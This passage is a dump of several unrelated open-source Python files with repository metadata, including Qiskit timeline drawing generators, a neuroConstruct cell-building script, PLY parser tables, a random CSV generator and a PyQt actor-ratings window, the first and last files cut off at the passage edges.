spaces = "\t".expandtabs(self.grandparent.prefs.doctabwidth[self.txtDoc.filetype])
line = ""
length = 0
for l in lines:
if len(l) > length:
length = len(l)
line = l
line = line.replace('\t', spaces)
self.txtDoc.SetScrollWidth(self.txtDoc.TextWidth(wx.stc.STC_STYLE_DEFAULT, line + bufferstring))
self.txtDoc.SetXOffset(0)
#/End Scrolling
self.Bind(wx.EVT_BUTTON, self.OnbtnClose, id=ID_CLOSE)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnbtnClose(self, event):
self.grandparent.mainpanel.ClosePanel(self.position, self.index)
def OnKeyDown(self, event):
self.grandparent.RunShortcuts(event)
|
[
"verbena1@d10d4a45-7336-0410-a5b7-655e53db1087"
] |
verbena1@d10d4a45-7336-0410-a5b7-655e53db1087
|
858d39bf587b28bb367e48d73d10a0af61bec0d9
|
280fd34615d5df47f17e423d195fc7d8947c3bec
|
/korona/html/tags/details.py
|
ee4430d664956375bfe4f369fa9f825f176f0c85
|
[
"MIT"
] |
permissive
|
bharadwajyarlagadda/korona
|
051b9ed0c3fd7cb0d7eaa77cfafdee668c078c78
|
ee4662b6a29907495e31ed2581dc5484bb03eadc
|
refs/heads/master
| 2023-01-19T08:15:09.546701
| 2016-09-29T20:45:56
| 2016-09-29T20:45:56
| 65,955,404
| 2
| 1
|
NOASSERTION
| 2022-12-26T20:27:38
| 2016-08-18T01:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 728
|
py
|
# -*- coding: utf-8 -*-
"""Module for constructing <details> tag."""
from __future__ import absolute_import
from ...templates.html.tags import details
class Details(object):
"""Class for constructing details tag.
Args:
open (bool): Specifies that the details should be visible (open) to
the user.
text (str): Specifies the details text. (As in
<details>{text}</details>)
.. versionadded:: 0.2.0
"""
def __init__(self, open=False, text=None):
self.tag = 'details'
self.values = {'open': open, 'text': text}
def construct(self):
"""Returns the constructed details tag <details></details>."""
return details.render(self.values)
|
[
"yarlagaddabharadwaj@gmail.com"
] |
yarlagaddabharadwaj@gmail.com
|
632c1950978a9b52b8c84997b63de3a8a3fe035b
|
88f3fc1a75dad865e9e0f9c4688370fa213b2939
|
/NEURON/create_nc_cell.py
|
ce2b82bf3e803952190d7c5d6c82aaaaa05efb59
|
[] |
no_license
|
OpenSourceBrain/korngreen-pyramidal
|
87dce9f2f509f93f955e6c9976440f02935ef2af
|
79a2354c377bd405bc3467ee5bf700c4dd15b73a
|
refs/heads/master
| 2021-07-10T08:32:45.485875
| 2021-03-10T09:16:35
| 2021-03-10T09:16:35
| 13,787,127
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,633
|
py
|
# utility script for setting model parameters for the Korngreen model
# from .params files, via neuroConstruct
import rlcompleter, readline
readline.parse_and_bind('tab: complete')
from java.io import File
from java.util import ArrayList
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.utils.equation import Variable
from ucl.physiol.neuroconstruct.cell import VariableParameter, VariableMechanism, ChannelMechanism, IonProperties, ParameterisedGroup
from korngreen_utils import AlmogKorngreenPars, Mechanism
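# Thin wrapper around a neuroConstruct project: load it, register cells, and save changes.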
class NCProject(object):
def __init__(self, fname):
self._project = self.load_project(fname)
def load_project(self, fname):
file = File(fname)
print 'Loading project file: ', file.getAbsolutePath()
pm = ProjectManager()
project = pm.loadProject(file)
print pm.status()
return project
    def add_cell(self, cell):
        self._project.cellManager.addCellType(cell)
def get_cell(self, name):
return self._project.cellManager.getCell(name)
def save(self):
self._project.markProjectAsEdited()
self._project.saveProject()
class KorngreenCell(object):
def __init__(self, parsname):
self._pars = AlmogKorngreenPars()
self._pars.pars_from_file(parsname)
def create_from_passive(self, pascell, name='test'):
cell = pascell.clone()
cell.setInstanceName(name)
self._cell = cell
def clear_groups(self):
for sec in self._cell.allSections:
groups = sec.getGroups().clone()
for g in groups:
sec.removeFromGroup(g)
def add_groups(self):
for sec in self._cell.allSections:
if not 'all' in sec.getGroups():
sec.addToGroup('all')
for pat,gname in {'dend':'basal_dend_group', 'apic':'apical_dend_group', 'soma':'soma_group', 'iseg':'iseg_group', 'myelin':'myelin_group', 'hill':'hill_group', 'node':'nodes_group'}.iteritems():
if pat in sec.getSectionName():
sec.addToGroup(gname)
@property
def groups(self):
return self._cell.getAllGroupNames()
@property
def parametrized_groups(self):
return self._cell.getParameterisedGroups()
@property
def cell(self):
return self._cell
def create_apical_parametrized_group(self):
#assuming that there is only one group with "apic" in the name!
pname = 'p'
pg = ParameterisedGroup('PathLengthApicalDends', 'apical_dend_group', ParameterisedGroup.Metric.PATH_LENGTH_FROM_ROOT, ParameterisedGroup.ProximalPref.NO_TRANSLATION, ParameterisedGroup.DistalPref.NO_NORMALISATION, pname)
self._cell.getParameterisedGroups().add(pg);
return pg
def add_inhomogeneous_mechanisms(self, mod=False):
pg = self.create_apical_parametrized_group()
for mech in self._pars.inhomogeneous_mechs:
if 'ca' in mech.name:
par = 'permeability'
else:
par = 'gmax'
if mod:
mech.name += '_mod'
vp = VariableParameter(par, mech.expr, Variable(pg.getVariable()), ArrayList())
vm = VariableMechanism(mech.name, vp)
for epname, epval in mech.extra_parameters.iteritems():
print 'extra par: ', epname, epval
vm.setExtraParam(epname, epval)
self._cell.associateParamGroupWithVarMech(pg, vm)
def add_mechanisms_to_group(self, group_name, list_mechs, mod=False):
for m in list_mechs:
name = m.name
val = m.gmax
if mod:
name += '_mod'
cm = ChannelMechanism(name, val)
for epname, epval in m.extra_parameters.iteritems():
cm.setExtraParam(epname, epval)
self._cell.associateGroupWithChanMech(group_name, cm)
def add_homogeneous_mechanisms(self, mod=False):
self.add_mechanisms_to_group('soma_group', self._pars.soma_group.mechanisms, mod)
self.add_mechanisms_to_group('hill_group', self._pars.hill_group.mechanisms, mod)
self.add_mechanisms_to_group('iseg_group', self._pars.iseg_group.mechanisms, mod)
self.add_mechanisms_to_group('nodes_group', self._pars.node_group.mechanisms, mod)
self.add_mechanisms_to_group('myelin_group', self._pars.myelin_group.mechanisms, mod)
self.add_mechanisms_to_group('basal_dend_group', self._pars.basal_dend_group.mechanisms, mod)
self.add_mechanisms_to_group('all', [Mechanism('cad', 0)])
def add_ion_properties(self):
self._cell.associateGroupWithIonProperties('all', IonProperties('na', self._pars.Ena))
self._cell.associateGroupWithIonProperties('all', IonProperties('k', self._pars.Ek))
self._cell.associateGroupWithIonProperties('all', IonProperties('ca', self._pars.cai, self._pars.cao))
for g in ['apical_dend_group', 'basal_dend_group', 'soma_group']:
self._cell.associateGroupWithIonProperties(g, IonProperties('h', -33.0))
if __name__ == '__main__':
proj = NCProject("../neuroConstruct/KorngreenPyramidal.ncx")
k = KorngreenCell("best.params")
#k.create_from_passive(proj.get_cell('A140612_pas'), 'A140612_nml')
k.create_from_passive(proj.get_cell('A140612_pas'), 'test')
#k.clear_groups()
k.add_groups()
k.add_inhomogeneous_mechanisms(mod=False)
k.add_homogeneous_mechanisms(mod=False)
k.add_ion_properties()
proj.add_cell(k.cell)
|
[
"borismarin@gmail.com"
] |
borismarin@gmail.com
|
e92d908cafaecefeb041446ec37ddd3296fec8b7
|
819b50e6cbdbe937950930c23cbc291f64599273
|
/main.py
|
b395bda86b77e9ef8165b49ac0cd1f6d6cdaf6fa
|
[] |
no_license
|
heyandresdjc/moc-data
|
60264ddf9ec758557634d0a56fd3cd1be15124b7
|
de3bc8e40deb520958d2d65243a95677a901673c
|
refs/heads/master
| 2021-06-13T20:01:33.585442
| 2019-03-25T18:13:45
| 2019-03-25T18:13:45
| 157,810,915
| 0
| 0
| null | 2021-03-20T00:43:06
| 2018-11-16T04:04:32
|
Python
|
UTF-8
|
Python
| false
| false
| 759
|
py
|
from random import choice
from string import ascii_letters as A_Z
import csv
CONDITION = [ "AR", "SV", "OH", "RD", "NS", "NE", "FN"]
def random_string(num):
return_str = ""
for _ in range(num):
return_str += choice(A_Z)
return return_str
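# e.g. random_string(5) might return 'kQzPa' -- the output is random; shown for illustration only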
fieldnames = ["part number", "serial number", "description", "condition", "quantity", "price"]
# open the file once instead of re-opening it for each of the 100000 rows
with open("andres.csv", "a") as csv_file:
    writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
    for _ in range(100000):
        part = {
            "part number": random_string(10),
            "serial number": random_string(10),
            "description": random_string(200),
            "condition": choice(CONDITION),
            "quantity": 1,
            "price": 0
        }
        writer.writerow(part)
|
[
"heyandresdjc@gmail.com"
] |
heyandresdjc@gmail.com
|
d6f19ff2bd531ee3d26e6b95468c8885edf1352f
|
c00d2cdeb15a159a10aed2ebbe3b15f52ee4ee97
|
/setup.py
|
b73ce184e47212962d9c5ab40ca4a67b0715e09c
|
[
"Unlicense"
] |
permissive
|
lwerdna/z80dis
|
6b76bd2ee5d38ffe09389329726add561cff5e8b
|
c1e11aed5a5f00c40c07d838f0fdcd282840d0b5
|
refs/heads/master
| 2020-07-02T13:19:05.986553
| 2020-05-01T15:14:49
| 2020-05-01T15:14:49
| 201,533,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="z80dis",
version="1.0.6",
author="Andrew Lamoureux",
author_email="foo@bar.com",
description="Z80 disassembler library",
long_description=long_description, # load from README.md
long_description_content_type="text/markdown",
url="https://github.com/lwerdna/z80dis",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: Public Domain",
"Operating System :: OS Independent",
],
)
|
[
"andrew@vector35.com"
] |
andrew@vector35.com
|
af803e00daf212de7d6cb712d1518f29f7f5bc7b
|
c078a5fe353c417ad514dbff49ba49a496a0c4a7
|
/manage.py
|
aec9870339a2465a79e30a15dec0bb5ea3e1f514
|
[] |
no_license
|
zofy/TicTacToe
|
7215f1b8be1ad1ff775b31fbf0152cf5383df71f
|
0eada26ae04a4a172548f5e4a5ccf4791104e541
|
refs/heads/master
| 2022-12-13T11:00:01.925715
| 2021-06-11T07:31:50
| 2021-06-11T07:31:50
| 50,509,892
| 0
| 0
| null | 2022-12-07T23:36:12
| 2016-01-27T13:41:46
|
HTML
|
UTF-8
|
Python
| false
| false
| 252
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TicTacToe.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"zofy11@gmail.com"
] |
zofy11@gmail.com
|
1bcdfe43cc927df5d11f1e47e7f8c7a24a54ce3f
|
273484a9dc7778e2c0310befcf65506e60b468c0
|
/neurolab/optimization/metric/__init__.py
|
e11ae9604fd4147e3ff6b787719c542742621216
|
[
"MIT"
] |
permissive
|
GabrieleLagani/HebbianLearning
|
942a44778abbaccc14bc624887b5d96c6506bfa5
|
a7ed2f8a5925426880b5c315a7caf1ef1891001a
|
refs/heads/master
| 2023-02-14T22:47:07.220429
| 2023-01-23T11:31:32
| 2023-01-23T11:31:32
| 219,447,087
| 15
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
from .crossent import *
from .mse import *
from .acc import *
from .topkacc import *
from .prec import *
from .map import *
from .elbo import *
from .crossent_elbo import *
|
[
"gabriele.lagani@gmail.com"
] |
gabriele.lagani@gmail.com
|
6967a05257a0d60c9f402aaefed8478edcb70175
|
94c8dd4126da6e9fe9acb2d1769e1c24abe195d3
|
/qiskit/visualization/timeline/generators.py
|
a21a6433dbcd447be2c4e9a077425b0e8d9bcd55
|
[
"Apache-2.0"
] |
permissive
|
levbishop/qiskit-terra
|
a75c2f96586768c12b51a117f9ccb7398b52843d
|
98130dd6158d1f1474e44dd5aeacbc619174ad63
|
refs/heads/master
| 2023-07-19T19:00:53.483204
| 2021-04-20T16:30:16
| 2021-04-20T16:30:16
| 181,052,828
| 1
| 0
|
Apache-2.0
| 2019-06-05T15:32:13
| 2019-04-12T17:20:54
|
Python
|
UTF-8
|
Python
| false
| false
| 15,283
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
A collection of functions that generate drawings from formatted input data.
See :py:mod:`~qiskit.visualization.timeline.types` for more info on the required data.
An end-user can write arbitrary functions that generate custom drawings.
Generators in this module are called with the `formatter` kwarg. This data provides
the stylesheet configuration.
There are 4 types of generators in this module.
1. generator.gates
In this stylesheet entry the input data is `types.ScheduledGate` and generates gate objects
such as time buckets and gate name annotations.
The function signature of the generator is restricted to:
```python
def my_object_generator(
gate: types.ScheduledGate,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the gate object.
```
2. generator.bits
In this stylesheet entry the input data is `types.Bits` and generates timeline objects
such as zero line and name of bit associated with the timeline.
The function signature of the generator is restricted to:
```python
def my_object_generator(
bit: types.Bits,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the bit object.
```
3. generator.barriers
In this stylesheet entry the input data is `types.Barrier` and generates barrier objects
such as barrier lines.
The function signature of the generator is restricted to:
```python
def my_object_generator(
barrier: types.Barrier,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the barrier object.
```
4. generator.gate_links
In this stylesheet entry the input data is `types.GateLink` and generates barrier objects
such as barrier lines.
The function signature of the generator is restricted to:
```python
def my_object_generator(
link: types.GateLink,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the link object.
```
Arbitrary generator function satisfying the above format can be accepted.
Returned `ElementaryData` can be arbitrary subclasses that are implemented in
the plotter API.
"""
import warnings
from typing import List, Union, Dict, Any
from qiskit.circuit.exceptions import CircuitError
from qiskit.visualization.timeline import types, drawings
def gen_sched_gate(gate: types.ScheduledGate,
formatter: Dict[str, Any],
) -> List[Union[drawings.TextData, drawings.BoxData]]:
"""Generate time bucket or symbol of scheduled gate.
If gate duration is zero or frame change a symbol is generated instead of time box.
The face color of gates depends on the operand type.
Stylesheet:
- The `gate` style is applied for finite duration gate.
- The `frame_change` style is applied for zero duration gate.
- The `gate_face_color` style is applied for face color.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` or `BoxData` drawings.
"""
try:
unitary = str(gate.operand.to_matrix())
except (AttributeError, CircuitError):
unitary = 'n/a'
try:
label = gate.operand.label or 'n/a'
except AttributeError:
label = 'n/a'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
meta = {
'name': gate.operand.name,
'label': label,
'bits': ', '.join([bit.register.name for bit in gate.bits]),
't0': gate.t0,
'duration': gate.duration,
'unitary': unitary,
'parameters': ', '.join(map(str, gate.operand.params))
}
# find color
color = formatter['color.gates'].get(gate.operand.name, formatter['color.default_gate'])
if gate.duration > 0:
# gate with finite duration pulse
styles = {
'zorder': formatter['layer.gate'],
'facecolor': color,
'alpha': formatter['alpha.gate'],
'linewidth': formatter['line_width.gate']
}
# assign special name to delay for filtering
if gate.operand.name == 'delay':
data_type = types.BoxType.DELAY
else:
data_type = types.BoxType.SCHED_GATE
drawing = drawings.BoxData(data_type=data_type,
xvals=[gate.t0, gate.t0 + gate.duration],
yvals=[-0.5 * formatter['box_height.gate'],
0.5 * formatter['box_height.gate']],
bit=gate.bits[gate.bit_position],
meta=meta,
styles=styles)
else:
# frame change
styles = {
'zorder': formatter['layer.frame_change'],
'color': color,
'size': formatter['text_size.frame_change'],
'va': 'center',
'ha': 'center'
}
unicode_symbol = formatter['unicode_symbol.frame_change']
latex_symbol = formatter['latex_symbol.frame_change']
drawing = drawings.TextData(data_type=types.SymbolType.FRAME,
bit=gate.bits[gate.bit_position],
xval=gate.t0,
yval=0,
text=unicode_symbol,
latex=latex_symbol,
styles=styles)
return [drawing]
def gen_full_gate_name(gate: types.ScheduledGate,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate gate name.
Parameters and associated bits are also shown.
Stylesheet:
- `gate_name` style is applied.
- `gate_latex_repr` key is used to find the latex representation of the gate name.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
if gate.duration > 0:
# gate with finite duration pulse
v_align = 'center'
v_pos = 0
else:
# frame change
v_align = 'bottom'
v_pos = formatter['label_offset.frame_change']
styles = {
'zorder': formatter['layer.gate_name'],
'color': formatter['color.gate_name'],
'size': formatter['text_size.gate_name'],
'va': v_align,
'ha': 'center'
}
# find latex representation
default_name = r'{{\rm {name}}}'.format(name=gate.operand.name)
latex_name = formatter['latex_symbol.gates'].get(gate.operand.name, default_name)
label_plain = '{name}'.format(name=gate.operand.name)
label_latex = r'{name}'.format(name=latex_name)
# bit index
with warnings.catch_warnings():
warnings.simplefilter("ignore")
if len(gate.bits) > 1:
bits_str = ', '.join(map(str, [bit.index for bit in gate.bits]))
label_plain += '[{bits}]'.format(bits=bits_str)
label_latex += '[{bits}]'.format(bits=bits_str)
# parameter list
params = []
for val in gate.operand.params:
try:
params.append('{val:.2f}'.format(val=float(val)))
except ValueError:
params.append('{val}'.format(val=val))
params_str = ', '.join(params)
if params_str and gate.operand.name != 'delay':
label_plain += '({params})'.format(params=params_str)
label_latex += '({params})'.format(params=params_str)
# duration
if gate.duration > 0:
label_plain += '[{dur}]'.format(dur=gate.duration)
label_latex += '[{dur}]'.format(dur=gate.duration)
# assign special name to delay for filtering
if gate.operand.name == 'delay':
data_type = types.LabelType.DELAY
else:
data_type = types.LabelType.GATE_NAME
drawing = drawings.TextData(data_type=data_type,
xval=gate.t0 + 0.5 * gate.duration,
yval=v_pos,
bit=gate.bits[gate.bit_position],
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_short_gate_name(gate: types.ScheduledGate,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate gate name.
Only operand name is shown.
Stylesheet:
- `gate_name` style is applied.
- `gate_latex_repr` key is used to find the latex representation of the gate name.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
if gate.duration > 0:
# gate with finite duration pulse
v_align = 'center'
v_pos = 0
else:
# frame change
v_align = 'bottom'
v_pos = formatter['label_offset.frame_change']
styles = {
'zorder': formatter['layer.gate_name'],
'color': formatter['color.gate_name'],
'size': formatter['text_size.gate_name'],
'va': v_align,
'ha': 'center'
}
# find latex representation
default_name = r'{{\rm {name}}}'.format(name=gate.operand.name)
latex_name = formatter['latex_symbol.gates'].get(gate.operand.name, default_name)
label_plain = '{name}'.format(name=gate.operand.name)
label_latex = '{name}'.format(name=latex_name)
    # assign special name to delay for filtering
if gate.operand.name == 'delay':
data_type = types.LabelType.DELAY
else:
data_type = types.LabelType.GATE_NAME
drawing = drawings.TextData(data_type=data_type,
xval=gate.t0 + 0.5 * gate.duration,
yval=v_pos,
bit=gate.bits[gate.bit_position],
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_timeslot(bit: types.Bits,
formatter: Dict[str, Any]
) -> List[drawings.BoxData]:
"""Generate time slot of associated bit.
Stylesheet:
- `timeslot` style is applied.
Args:
bit: Bit object associated to this drawing.
formatter: Dictionary of stylesheet settings.
Returns:
List of `BoxData` drawings.
"""
styles = {
'zorder': formatter['layer.timeslot'],
'alpha': formatter['alpha.timeslot'],
'linewidth': formatter['line_width.timeslot'],
'facecolor': formatter['color.timeslot']
}
drawing = drawings.BoxData(data_type=types.BoxType.TIMELINE,
xvals=[types.AbstractCoordinate.LEFT,
types.AbstractCoordinate.RIGHT],
yvals=[-0.5 * formatter['box_height.timeslot'],
0.5 * formatter['box_height.timeslot']],
bit=bit,
styles=styles)
return [drawing]
def gen_bit_name(bit: types.Bits,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate bit label.
Stylesheet:
- `bit_name` style is applied.
Args:
bit: Bit object associated to this drawing.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
styles = {
'zorder': formatter['layer.bit_name'],
'color': formatter['color.bit_name'],
'size': formatter['text_size.bit_name'],
'va': 'center',
'ha': 'right'
}
with warnings.catch_warnings():
warnings.simplefilter("ignore")
label_plain = '{name}'.format(name=bit.register.name)
label_latex = r'{{\rm {register}}}_{{{index}}}'.format(register=bit.register.prefix,
index=bit.index)
drawing = drawings.TextData(data_type=types.LabelType.BIT_NAME,
xval=types.AbstractCoordinate.LEFT,
yval=0,
bit=bit,
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_barrier(barrier: types.Barrier,
formatter: Dict[str, Any]
) -> List[drawings.LineData]:
"""Generate barrier line.
Stylesheet:
- `barrier` style is applied.
Args:
barrier: Barrier instruction.
formatter: Dictionary of stylesheet settings.
Returns:
List of `LineData` drawings.
"""
styles = {
'alpha': formatter['alpha.barrier'],
'zorder': formatter['layer.barrier'],
'linewidth': formatter['line_width.barrier'],
'linestyle': formatter['line_style.barrier'],
'color': formatter['color.barrier']
}
drawing = drawings.LineData(data_type=types.LineType.BARRIER,
xvals=[barrier.t0, barrier.t0],
yvals=[-0.5, 0.5],
bit=barrier.bits[barrier.bit_position],
styles=styles)
return [drawing]
def gen_gate_link(link: types.GateLink,
formatter: Dict[str, Any]
) -> List[drawings.GateLinkData]:
"""Generate gate link line.
Line color depends on the operand type.
Stylesheet:
- `gate_link` style is applied.
- The `gate_face_color` style is applied for line color.
Args:
link: Gate link object.
formatter: Dictionary of stylesheet settings.
Returns:
List of `GateLinkData` drawings.
"""
# find line color
color = formatter['color.gates'].get(link.opname, formatter['color.default_gate'])
styles = {
'alpha': formatter['alpha.gate_link'],
'zorder': formatter['layer.gate_link'],
'linewidth': formatter['line_width.gate_link'],
'linestyle': formatter['line_style.gate_link'],
'color': color
}
drawing = drawings.GateLinkData(bits=link.bits,
xval=link.t0,
styles=styles)
return [drawing]
|
[
"noreply@github.com"
] |
levbishop.noreply@github.com
|
bdb1af6cfd3542d9d233b67bf76a802451af8e38
|
bf413d16c87db978c4abfe7cfaf8c18b1054469f
|
/program/tests/test_witness_complex.py
|
b5dca06d326a6c9344c4baee4a13d007beccba80
|
[] |
no_license
|
ilonatommy/ShapeVis
|
b7289d63f81fd9aafefcd7337f7cb52242f4ffd0
|
c9f4aaaaaa57130df4dc579cf7f7d23efa05fca6
|
refs/heads/master
| 2022-11-23T11:31:39.596675
| 2020-07-14T20:21:46
| 2020-07-14T20:21:46
| 260,666,710
| 0
| 0
| null | 2020-07-14T20:21:47
| 2020-05-02T10:50:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,754
|
py
|
import unittest
from unittest.mock import patch, Mock
import numpy as np
from source.witness_complex import WitnessComplexGraphBuilder
from source.randomizer import Randomizer
from source.data_processor import DataProcessor
from source.algo_comparer import AlgoComparer
TEST_DATA = np.array([[1, 1.5], [1.75, 1.75], [2.5, 0.5], [0,0], [3,2], [1.25, 0]])
TEST_LABELS = np.array([0, 1, 1, 0, 1, 0])
TEST_CLASSES = range(2)
TEST_SAMPLES_IDXS = [1, 0, 5]
TEST_SAMPLES = [np.array([1.75, 1.75]), np.array([1. , 1.5]), np.array([1.25, 0. ])]
class TestWitnessComplex(unittest.TestCase):
@patch('source.randomizer.Randomizer')
def setUp(self, MockRandomizer):
mock_randomizer = MockRandomizer.return_value
expected_nodes = TEST_SAMPLES
mock_randomizer.sample.return_value = TEST_SAMPLES_IDXS
stub_data_processor = DataProcessor()
stub_data_processor.data = TEST_DATA
stub_data_processor.labels = TEST_LABELS
stub_data_processor.names = TEST_CLASSES
self.sut = WitnessComplexGraphBuilder(stub_data_processor, len(TEST_SAMPLES))
def test_knn_graph_creation(self):
self.sut.build_knn()
expected_edges = [('[1.75 1.75]', '[1. 1.5]'), ('[1. 1.5]', '[1.25 0. ]')]
edges = self.sut.get_graph().edges
np.testing.assert_array_equal(edges, expected_edges)
def test_knn_augmentation(self):
self.sut.build_knn()
self.sut.build_augmented_knn()
expected_edges = [('[1.75 1.75]', '[1. 1.5]'), ('[1.75 1.75]', '[1.25 0. ]'), ('[1. 1.5]', '[1.25 0. ]')]
edges = self.sut.get_graph().edges
np.testing.assert_array_equal(edges, expected_edges)
if __name__ == '__main__':
unittest.main()
|
[
"mactob25@gmail.com"
] |
mactob25@gmail.com
|
b824778aad03d683ce7f0228878aefb56b70c1bc
|
37d6315233f39d2fc465be29365f1e8c96a69231
|
/hocs/parsetab.py
|
7c49fdf5308298e44cce8a3f3af5dfb6d4e15f00
|
[] |
no_license
|
asdf1234Damian/Compilers
|
e759600a0803819ff1109a575f91d54716af276b
|
a74776c344bfc1abcc348415220e5e8bd02152da
|
refs/heads/master
| 2020-04-19T08:11:15.952573
| 2019-06-05T14:16:01
| 2019-06-05T14:16:01
| 168,068,271
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,169
|
py
|
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'rightEQUALSleftPLUSMINUSleftPORDIVIDEDIVIDE EQUALS LPAR MINUS NUMBER PLUS POR RPAR VARexpr : NUMBERexpr : VARexpr : VAR EQUALS exprexpr : expr PLUS exprexpr : expr MINUS exprexpr : expr POR exprexpr : expr DIVIDE exprexpr : LPAR expr RPARexpr : MINUS expr'
_lr_action_items = {'NUMBER':([0,4,5,6,7,8,9,10,],[2,2,2,2,2,2,2,2,]),'VAR':([0,4,5,6,7,8,9,10,],[3,3,3,3,3,3,3,3,]),'LPAR':([0,4,5,6,7,8,9,10,],[5,5,5,5,5,5,5,5,]),'MINUS':([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,],[4,7,-1,-2,4,4,4,4,4,4,4,-9,7,-4,-5,-6,-7,7,-8,]),'$end':([1,2,3,11,13,14,15,16,17,18,],[0,-1,-2,-9,-4,-5,-6,-7,-3,-8,]),'PLUS':([1,2,3,11,12,13,14,15,16,17,18,],[6,-1,-2,-9,6,-4,-5,-6,-7,6,-8,]),'POR':([1,2,3,11,12,13,14,15,16,17,18,],[8,-1,-2,8,8,8,8,-6,-7,8,-8,]),'DIVIDE':([1,2,3,11,12,13,14,15,16,17,18,],[9,-1,-2,9,9,9,9,-6,-7,9,-8,]),'RPAR':([2,3,11,12,13,14,15,16,17,18,],[-1,-2,-9,18,-4,-5,-6,-7,-3,-8,]),'EQUALS':([3,],[10,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'expr':([0,4,5,6,7,8,9,10,],[1,11,12,13,14,15,16,17,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> expr","S'",1,None,None,None),
('expr -> NUMBER','expr',1,'p_num','hoc2.py',17),
('expr -> VAR','expr',1,'p_var','hoc2.py',21),
('expr -> VAR EQUALS expr','expr',3,'p_var_equals_exp','hoc2.py',25),
('expr -> expr PLUS expr','expr',3,'p_exp_plus_exp','hoc2.py',30),
('expr -> expr MINUS expr','expr',3,'p_exp_min_exp','hoc2.py',34),
('expr -> expr POR expr','expr',3,'p_exp_por_exp','hoc2.py',38),
('expr -> expr DIVIDE expr','expr',3,'p_exp_div_exp','hoc2.py',42),
('expr -> LPAR expr RPAR','expr',3,'p_par_exp_par','hoc2.py',49),
('expr -> MINUS expr','expr',2,'p_min_exp','hoc2.py',53),
]
|
[
"memoriasnaranjo98@gmail.com"
] |
memoriasnaranjo98@gmail.com
|
8c323d87fbb43ffa0517dd1c18f8fe1239c01308
|
d489e64a7ccb20be9289b460ee5de9d55bca3e32
|
/src/controller/actorWindow.py
|
0990f71b5ab2c1c58783ef6f62e3bd0601e05cc0
|
[] |
no_license
|
John-Dilla/imdbScraper
|
1d77cbda80281c99f8eae17cbc9f3e93e11cfbd0
|
2ce53c3cfaa518f647cde234130fda1cef3e09fd
|
refs/heads/main
| 2023-05-27T01:21:03.417367
| 2021-06-11T11:52:36
| 2021-06-11T11:52:36
| 360,892,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,567
|
py
|
from os.path import abspath
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QWidget
from PyQt5 import QtCore, QtWidgets
from PyQt5 import uic
from PyQt5.QtGui import QPixmap
import pandas as pd
from src.controller.model import PandasModel
from src.scraper.scrapeController import Controller
import src.utility.fileHandler as io
import src.utility.tableHandler as th
class Actor(QWidget):
"""The class to show the window for an actor or actress.
Args:
QWidget (QWidget): The type of the window.
"""
def __init__(self, actorID: str) -> None:
"""Initializes the UI window of an actor or actress.
Args:
actorID (str): The IMDB-ID of an actor or actress.
"""
super().__init__()
self._actorID = actorID
        try:
            self._modelRatings = PandasModel(th.ratingPerYear(actorID))
        except OSError:
            # database for this actor is empty: scrape it first, then build the model
            print("Actor or Actress has not been scraped before.")
            _scraper = Controller("")
            _scraper.scrapeSingleActor(actorID)
            self._modelRatings = PandasModel(th.ratingPerYear(actorID))
self._dfGenres = io.getTable("filmography", "genre_"+actorID)
self._modelGenres = PandasModel(self._dfGenres)
self._dfAwards = io.getTable("awards", actorID)
self._modelAwards = PandasModel(self._dfAwards)
self._dfMovies = io.getTable("filmography", actorID)
self._modelMovies = PandasModel(self._dfMovies)
self._modelTop5 = PandasModel(th.top5Movie(actorID))
# Load the .ui file
